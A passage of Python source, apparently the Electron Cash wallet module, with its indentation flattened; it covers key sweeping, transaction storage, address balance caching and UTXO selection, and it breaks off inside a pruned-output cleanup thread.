from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history chages). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Adddress objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text = None):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def invalidate_address_set_cache(self):
''' This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient.'''
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
''' Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method! '''
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up siince is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_height(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
assert isinstance(address, Address)
"effect of tx on address"
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
def get_wallet_delta(self, tx):
""" effect of tx on wallet """
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
d = self.txo.get(item['prevout_hash'], {}).get(addr, [])
for n, v, cb in d:
if n == item['prevout_n']:
value = v
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
return is_relevant, is_mine, v, fee
def get_tx_info(self, tx):
is_relevant, is_mine, v, fee = self.get_wallet_delta(tx)
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
else:
status = _('Not verified')
else:
status = _('Unconfirmed')
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
status = _("Unsigned") if s == 0 else _('Partially signed') + ' (%d/%d)'%(s,r)
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
return tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
